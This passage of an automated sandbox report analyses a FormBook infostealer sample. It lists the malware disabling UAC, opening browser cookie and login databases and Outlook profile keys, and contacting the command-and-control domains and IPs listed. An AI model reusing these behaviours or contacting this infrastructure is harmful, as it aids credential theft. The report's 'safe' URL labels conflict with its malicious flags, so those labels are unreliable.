Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4130637411.0000000004DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4128948206.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4130704581.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	512 Process Injection	1 Modify Registry	1 OS Credential Dumping	241 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	21 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eNXDCIvEXI.exe	51%	Virustotal		Browse
eNXDCIvEXI.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Leonem
eNXDCIvEXI.exe	100%	Avira	TR/AD.Swotter.gohzz
eNXDCIvEXI.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
carliente.com	1%	Virustotal	Browse
lenslaser.com	0%	Virustotal	Browse
zhs.zohosites.com	0%	Virustotal	Browse
www.gledingakademiet.no	1%	Virustotal	Browse
www.celebration24.co.uk	1%	Virustotal	Browse
www.zwervertjes.be	0%	Virustotal	Browse
www.prizesupermarket.com	0%	Virustotal	Browse
www.lenslaser.com	0%	Virustotal	Browse
www.jrksa.info	2%	Virustotal	Browse
www.alfaspa.net	0%	Virustotal	Browse
www.allinone24.shop	0%	Virustotal	Browse
www.carliente.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.deaybrid.info/mcz6/?l65lvjLx=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info	0%	Avira URL Cloud	safe
http://www.carliente.com/mcz6/	0%	Avira URL Cloud	safe
http://www.jrksa.info/mcz6/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/images/professionally-crafted-themes.png	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info	0%	Virustotal		Browse
http://www.lenslaser.com/mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://upx.sf.net	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.allinone24.shop/mcz6/	0%	Avira URL Cloud	safe
http://www.walletweb367.top/mcz6/?l65lvjLx=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://www.allinone24.shop/mcz6/	2%	Virustotal		Browse
http://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
https://www.zoho.com/sites/images/professionally-crafted-themes.png	0%	Virustotal		Browse
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
http://upx.sf.net	0%	Virustotal		Browse
http://www.jrksa.info/mcz6/	1%	Virustotal		Browse
http://www.carliente.com/mcz6/?l65lvjLx=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
http://www.allinone24.shop	0%	Avira URL Cloud	safe
https://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74G	0%	Avira URL Cloud	safe
https://www.ecosia.org/newtab/	0%	Virustotal		Browse
http://www.lenslaser.com/mcz6/	0%	Avira URL Cloud	safe
http://www.lenslaser.com/mcz6/	1%	Virustotal		Browse
https://www.fastmail.help/hc/en-us/articles/1500000280141	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Avira URL Cloud	safe
https://www.fastmail.help/hc/en-us/articles/1500000280141	0%	Virustotal		Browse
http://www.allinone24.shop	0%	Virustotal		Browse
https://www.google.com	0%	Avira URL Cloud	safe
http://www.zwervertjes.be/mcz6/?l65lvjLx=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
http://www.walletweb367.top/mcz6/	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	Avira URL Cloud	safe
http://www.deaybrid.info/mcz6/	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	Virustotal		Browse
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Virustotal		Browse
http://www.dty377.com/mcz6/?l65lvjLx=D5+pF2/O5onkRgs/QJm4Uknwa72XtjRGMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiSXtozRCrs8BT1aTzU0SzNo1URyRzwyLi3Bw=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
http://www.celebration24.co.uk/mcz6/?l65lvjLx=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
http://www.walletweb367.top/mcz6/	0%	Virustotal		Browse
https://www.fastmailusercontent.com/filestorage/css/main.css	0%	Avira URL Cloud	safe
http://www.jrksa.info/mcz6/?l65lvjLx=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks=&Znv8F=zltpR6V05ztTbh	0%	Avira URL Cloud	safe
http://www.zwervertjes.be/mcz6/	0%	Avira URL Cloud	safe
https://yundun.console.aliyun.com/?p=waf#/waf/cn/dashboard/index	0%	Avira URL Cloud	safe
http://www.gledingakademiet.no/mcz6/	0%	Avira URL Cloud	safe
https://www.fastmailusercontent.com/filestorage/css/main.css	0%	Virustotal		Browse
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	0%	Avira URL Cloud	safe
https://yundun.console.aliyun.com/?p=waf#/waf/cn/dashboard/index	0%	Virustotal		Browse
http://www.celebration24.co.uk/mcz6/	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Avira URL Cloud	safe
https://www.strato.de	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	Virustotal		Browse
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	0%	Virustotal		Browse
https://www.strato.de	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
carliente.com	217.160.0.111	true	true	1%, Virustotal, Browse	unknown
lenslaser.com	162.241.216.140	true	true	0%, Virustotal, Browse	unknown
zhs.zohosites.com	136.143.180.12	true	true	0%, Virustotal, Browse	unknown
allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai	57.151.38.169	true	true		unknown
www.deaybrid.info	162.0.237.22	true	true		unknown
www.gledingakademiet.no	104.37.39.71	true	true	1%, Virustotal, Browse	unknown
bf25cccbe24946c2a82ffd27a4b80f42.pacloudflare.com	172.65.176.239	true	true		unknown
www.celebration24.co.uk	103.168.172.37	true	true	1%, Virustotal, Browse	unknown
www.zwervertjes.be	199.59.243.225	true	true	0%, Virustotal, Browse	unknown
www.walletweb367.top	91.195.240.123	true	true		unknown
www.cookedatthebottom.com	unknown	unknown	true		unknown
www.prizesupermarket.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.alfaspa.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.polhi.lol	unknown	unknown	true		unknown
www.dty377.com	unknown	unknown	true		unknown
www.lenslaser.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.jrksa.info	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.maerealtysg.com	unknown	unknown	true		unknown
www.allinone24.shop	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.carliente.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.deaybrid.info/mcz6/?l65lvjLx=Z7d5vO3PiPWE/zeJlxtYmOYnF8uMEonypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08U8eULhaLH/eruf+vtSehKJ3r2fKzbVPqM3Ks=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.carliente.com/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.jrksa.info/mcz6/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.lenslaser.com/mcz6/?l65lvjLx=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.allinone24.shop/mcz6/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.walletweb367.top/mcz6/?l65lvjLx=+LASaW8sLlti/Y5p1q0qKU3hQBfGLeZfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6VqrKvXOipPExFwKQmiwKnwFMVTTGbdQXrJvJk=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1ga/G/HMKcAJl8ZLysNQgHdg+oe+l1VwrhC98=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.carliente.com/mcz6/?l65lvjLx=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.lenslaser.com/mcz6/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.zwervertjes.be/mcz6/?l65lvjLx=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.walletweb367.top/mcz6/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.deaybrid.info/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.dty377.com/mcz6/?l65lvjLx=D5+pF2/O5onkRgs/QJm4Uknwa72XtjRGMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiSXtozRCrs8BT1aTzU0SzNo1URyRzwyLi3Bw=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.celebration24.co.uk/mcz6/?l65lvjLx=WM8YJa5qA0NkIP/fN4mRPH2hsfvjO1kWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WN5VMBaPcH6h4tJWWqH5H+VkhDr+c9eHm1vWk=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.jrksa.info/mcz6/?l65lvjLx=5d/f0hfwoo/9d3f97tbdjxDk4KU85C4YC37M3UWhy4ALmXvbgMxGv66I6qe5jd4u2tKoxygbv/cknJWC1exftQvP2lviqJawgXV46wbQMN+Gc/xUQSNa8ks=&Znv8F=zltpR6V05ztTbh	true	Avira URL Cloud: safe	unknown
http://www.zwervertjes.be/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.gledingakademiet.no/mcz6/	true	Avira URL Cloud: safe	unknown
http://www.celebration24.co.uk/mcz6/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info	chkdsk.exe, 0000000C.00000002.4131433850.0000000006864000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.zoho.com/sites/images/professionally-crafted-themes.png	chkdsk.exe, 0000000C.00000002.4131433850.0000000006864000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.9.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.allinone24.shop	FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4132492127.00000000052F9000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.allinone24.shop/mcz6/?l65lvjLx=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0qP29Gns/tznWejtp74G	chkdsk.exe, 0000000C.00000002.4131433850.0000000005EF8000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003578000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.fastmail.help/hc/en-us/articles/1500000280141	chkdsk.exe, 0000000C.00000002.4131433850.0000000006B88000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000004208000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com	chkdsk.exe, 0000000C.00000002.4133130062.0000000008190000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131433850.000000000703E000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.00000000046BE000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.fastmailusercontent.com/filestorage/css/main.css	chkdsk.exe, 0000000C.00000002.4131433850.0000000006B88000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000004208000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://yundun.console.aliyun.com/?p=waf#/waf/cn/dashboard/index	chkdsk.exe, 0000000C.00000002.4131433850.0000000005BD4000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003254000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2126608628.000000001F514000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	chkdsk.exe, 0000000C.00000002.4131433850.0000000006864000.00000004.10000000.00040000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.0000000003EE4000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	chkdsk.exe, 0000000C.00000003.2020661533.0000000004DB9000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.strato.de	FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4130813346.000000000389C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.65.176.239	bf25cccbe24946c2a82ffd27a4b80f42.pacloudflare.com	United States	13335	CLOUDFLARENETUS	true
103.168.172.37	www.celebration24.co.uk	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
104.37.39.71	www.gledingakademiet.no	Denmark	51468	ONECOMDK	true
217.160.0.111	carliente.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
162.0.237.22	www.deaybrid.info	Canada	22612	NAMECHEAP-NETUS	true
162.241.216.140	lenslaser.com	United States	46606	UNIFIEDLAYER-AS-1US	true
136.143.180.12	zhs.zohosites.com	United States	2639	ZOHO-ASUS	true
91.195.240.123	www.walletweb367.top	Germany	47846	SEDO-ASDE	true
57.151.38.169	allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai	Belgium	2686	ATGS-MMD-ASUS	true
199.59.243.225	www.zwervertjes.be	United States	395082	BODIS-NJUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1452968
Start date and time:	2024-06-06 13:24:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eNXDCIvEXI.exe renamed because original name is a hash value
Original Sample Name:	650084a6aa83319aa801995935c36f0e2f4be3a537b6936a2f317df83909120f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@18/11@15/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 57% Number of executed functions: 167 Number of non-executed functions: 248
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, bvty.gtm-cloudflare.net.cdn.cloudflare.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
